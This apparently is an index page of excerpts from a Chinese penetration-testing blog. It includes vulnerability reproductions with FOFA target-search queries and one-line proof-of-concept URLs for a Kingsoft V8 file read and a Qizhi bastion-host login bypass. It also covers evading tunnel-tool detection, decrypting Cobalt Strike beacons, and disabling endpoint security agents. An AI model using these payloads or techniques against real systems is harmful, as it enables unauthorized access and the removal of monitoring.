Kingsoft-V8-vulnerability金山 V8 終端安全系统任意文件读取漏洞 FOFA title="在线安装-V8+终端安全系统Web控制台" POC 1http://xxx.xxx.xxx.xxx/htmltopdf/downfile.php?filename=downfile.php 金山V8 终端安全系统命令执行漏洞 原文:https://mp.weixin.qq.com/s/eQtyY3B8jwV 2021-07-12 漏洞复现 #vuln
Ruijie-NBR-router-RCE锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 CNVD-2021-09650 HW漏洞,锐捷NBR路由器 EWEB网管系统部分接口存在命令注入 验证 fofa title="锐捷网络-EWEB网管系统" 或者 icon_hash="-692947551" 登录页面这样子: 出现漏洞的文件在 /guest_auth/guestIsUp.php 12 2021-07-12 漏洞复现 #vuln
齐治堡垒机任意用户登录齐治堡垒机存在任意用户登录漏洞 齐治堡垒机存在任意用户登录漏洞,访问特定的URL即可获得后台权限 验证 fofa app="齐治科技-堡垒机" POC 1http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr( 2021-07-12 漏洞复现 #vuln
修改FRP环境 Platform:Kali Linux Editor:IEDA(Golang) Go Version:Go1.16 下载master分支源码,建议通过git clone方式。IEDA打开。https://github.com/fatedier/frp/tree/master 注:以下使用的frp版本0.36.2的源码,其他版理论上也是可以用的。 改改标识 全局查找替换:json:" 2021-05-14 技术水文 > 编程语言 #Go
某云课堂RSA加密登陆爆破小记某天,Leader随手甩了个目标,要对某课堂做测试。我xxx****,又是个开头登录页面的“破站”。 没有验证码,祭出Burp Suite爆之! 然而,然而,password字段居然是加密的,现在开发的安全意识都这么“高”了吗? 不想测这破站,只想摸鱼领个底薪,不测了,破站扔一边去… 几天后… Leader:站点测试怎么样了,报告发一下 Me:额,快好了,正在整理报告了,稍后发。 再度 2021-04-07 技术水文
S2-001复现漏洞详情 https://cwiki.apache.org/confluence/display/WW/S2-001 由于OGNL表达式的递归执行,造成了命令执行。 环境搭建 Kali Linux IntelliJ Idea 2020.3.2 Apache-Tomcat/9.0.43 Java Open JDK 8 先给IDEA装struts 2插件: 新建项目: 下载 2021-03-27 漏洞复现 #CVE-2007-4556 #Struts2
CsdecryptBeaconCS beacon资源解密 原文 https://xz.aliyun.com/t/9224 解压 CS 核心文件 cobaltstrike.jar 提内容: 1234mkdir -p CSDecrypt/srcunzip CobaltStrike4.1/cobaltstrike.jar -d CSDecrypt/srccd CSDecrypt/srctouch Csdecrypt.java 解密脚 2021-03-27
禁用联软准入助手&卡巴斯基在某地驻场,客户要求装联软准入助手和卡巴。装上了它就被监控着了,而且打开一些非“正规”授权的软件都会遭受它的拦截。卡巴斯基则是把电脑中“不安全”的软件、脚本杀得片甲不留… 前置条件 PE启动盘一个 Start 进PE,使用PE注册表加载系统注册表文件(不懂请自行Google),名称随意,修改前注意备份。 联软准入助手: 注册表文件:C:\Windows\System32\config\SYSTE 2020-07-25 杂项 #Cracked #Something
VMware安装MacOS-MK-unlocker删除或注释 win-install.cmd line 9-23 12345678910111213141516chcp 850net session >NUL 2>&1if %errorlevel% neq 0 ( echo Administrator privileges required! exit /b)echo.set KeyName="HKLM 2020-06-26 资源分享 #Cracked #Bug
白嫖Xray批量检测内网Fastjson简文来自于@loulan-ling师傅 白嫖xray高级版 最近又双叒叕白嫖到了xray的高级版,刚好高级版支持fastjson扫描,刚好解决了我最近工作问题(批量检测内网fastjson)。 本次要用到xray高级版,xray反连平台 配置xray反连平台 首先先把xray反连平台设置好,将listen_ip修改为本地ip。 把当前xray所有的文件都复制到另一个xray2文件 启动 2020-06-13 技术水文 #Xray #Fastjson